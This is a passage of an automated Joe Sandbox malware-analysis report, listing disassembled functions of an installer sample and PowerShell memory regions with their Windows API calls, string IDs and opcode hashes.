                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1599320355-0
                                                                                                                                        • Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                        • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                                                                                                                        • Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                        • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                                                                                                                        Function 00407224 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                        • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                                                                                        • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                                                                                                        • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                        • String ID: Version
                                                                                                                                        • API String ID: 512980652-315105994
                                                                                                                                        • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                        • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                                                                                                                        • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                        • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                                                                                                                        Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                                                                                        • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                        • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                                                        • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2102729457-0
                                                                                                                                        • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                        • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                                                                                                                        • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                        • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                                                                                                                        Function 00406391 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2883127279-0
                                                                                                                                        • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                        • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                                                                                                                        • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                        • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                                                                                                                        Function 004048F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • IsWindowVisible.USER32(?), ref: 0040492E
                                                                                                                                        • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                                                                                          • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$CallMessageProcSendVisible
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3748168415-3916222277
                                                                                                                                        • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                        • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                                                                                                                        • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                        • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                                                                                                                        Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                        • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: PrivateProfileStringlstrcmp
                                                                                                                                        • String ID: !N~
                                                                                                                                        • API String ID: 623250636-529124213
                                                                                                                                        • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                        • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                                                                                                                        • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                        • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                                                                                                                        Function 00405C6B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                        Strings
                                                                                                                                        • Error launching installer, xrefs: 00405C74
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseCreateHandleProcess
                                                                                                                                        • String ID: Error launching installer
                                                                                                                                        • API String ID: 3712363035-66219284
                                                                                                                                        • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                        • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                                                                                                                        • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                        • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                                                                                                                        Function 004062CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                        • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                          • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                        • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                        • API String ID: 3509786178-2769509956
                                                                                                                                        • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                        • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                                                                                                                        • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                        • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                                                                                                                        Function 00405DE2 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                        • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                                                                                        • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                                                                                        • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 190613189-0
                                                                                                                                        • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                        • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                                                                                        • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                        • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

                                                                                                                                        Executed Functions

                                                                                                                                        Function 077C1798 Relevance: 14.6, Strings: 11, Instructions: 851COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000010.00000002.2154114053.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_16_2_77c0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$tPtq$tPtq$$tq$$tq$$tq
                                                                                                                                        • API String ID: 0-2659758652
                                                                                                                                        • Opcode ID: f1f2939d31f6902a181cfe9c4e72c2abbcfa1e5173521b1af18260abca5992fe
                                                                                                                                        • Instruction ID: 6df67a211182cfe5a17d7caf224cb21fa171f6adb68c44eea204d6bdef0e502d
                                                                                                                                        • Opcode Fuzzy Hash: f1f2939d31f6902a181cfe9c4e72c2abbcfa1e5173521b1af18260abca5992fe
                                                                                                                                        • Instruction Fuzzy Hash: DA5258F170424D9FDB25DB6988006BABBA2AFCA391F5484BFD905CF252DB35C841C7A1
                                                                                                                                        Function 04C05E30 Relevance: .5, Instructions: 481COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000010.00000002.2149721885.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_16_2_4c00000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 07f96ccd1c6a4fd31c499767d6b62e39099de98fdbf3afbafe84bb6410627fb6
                                                                                                                                        • Instruction ID: 34710b2379ba8d3465a1eb1227f7e53aa3b73c624342ea1fe136f6f94a84960d
                                                                                                                                        • Opcode Fuzzy Hash: 07f96ccd1c6a4fd31c499767d6b62e39099de98fdbf3afbafe84bb6410627fb6
                                                                                                                                        • Instruction Fuzzy Hash: F8121A74A002199FCB14CF98C484AADFBB2FF88310F258559E849AB395C735ED91CF90
                                                                                                                                        Function 04C02F68 Relevance: .5, Instructions: 474COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000010.00000002.2149721885.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_16_2_4c00000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: a4b98ff67f3631940d6055445d0a17300738301c091c67448c73129517fef194
                                                                                                                                        • Instruction ID: 70f44609bb20ae52dcbfad50312f7f6bb292b7a979b45d10cfde0976986ee5da
                                                                                                                                        • Opcode Fuzzy Hash: a4b98ff67f3631940d6055445d0a17300738301c091c67448c73129517fef194
                                                                                                                                        • Instruction Fuzzy Hash: DF123F74A052499FCB05CFA8C494AADFBB2FF49310F25C559E805AB3A1C735ED81CB90
                                                                                                                                        Function 04C033E0 Relevance: .1, Instructions: 109COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000010.00000002.2149721885.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_16_2_4c00000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 0d8eb4cda1df2a2c7e43caabffc5fb49a11e7744432140e6c4ee7cd2192a5d54
                                                                                                                                        • Instruction ID: b9cff37e2981157d36d63ee1131cf7e2e73fa1eeb41ce44e9c9631518542a3a4
                                                                                                                                        • Opcode Fuzzy Hash: 0d8eb4cda1df2a2c7e43caabffc5fb49a11e7744432140e6c4ee7cd2192a5d54
                                                                                                                                        • Instruction Fuzzy Hash: 074129B4A005498FCB06CF98C4949AEFBB2FF48310B158699D805AB3A4C736FD51CFA4
                                                                                                                                        Function 04C033F0 Relevance: .1, Instructions: 102COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000010.00000002.2149721885.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_16_2_4c00000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 1802dc018d5398dce8084161a1773e66da3332649a19273005a44ddf75c5ef64
                                                                                                                                        • Instruction ID: 78b8f109bc99bc2e2b4c8b2c49469bd535837ae7cbbaec5e8a11fb2de764ff64
                                                                                                                                        • Opcode Fuzzy Hash: 1802dc018d5398dce8084161a1773e66da3332649a19273005a44ddf75c5ef64
                                                                                                                                        • Instruction Fuzzy Hash: F34117B4A005499FCB06CF98C4949AEFBB2FF48310B658559D905AB3A4C732FD51CBA0
                                                                                                                                        Function 04C02AA0 Relevance: .1, Instructions: 74COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000010.00000002.2149721885.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_16_2_4c00000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 51a9043ea86ec1356b620775e15de4b20ecb771a0784646d3ad664a4b4cb0f06
                                                                                                                                        • Instruction ID: c6bf1a83057417633d07746642e82d53a5cd82706f908d50ed3292cb680e8762
                                                                                                                                        • Opcode Fuzzy Hash: 51a9043ea86ec1356b620775e15de4b20ecb771a0784646d3ad664a4b4cb0f06
                                                                                                                                        • Instruction Fuzzy Hash: AB21F6B4A046199FCB01CF59C8849AAFBB2FF49310B1485A6E509EB761C735FD41CBA1
                                                                                                                                        Function 04C02A90 Relevance: .1, Instructions: 71COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000010.00000002.2149721885.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_16_2_4c00000_powershell.jbxd
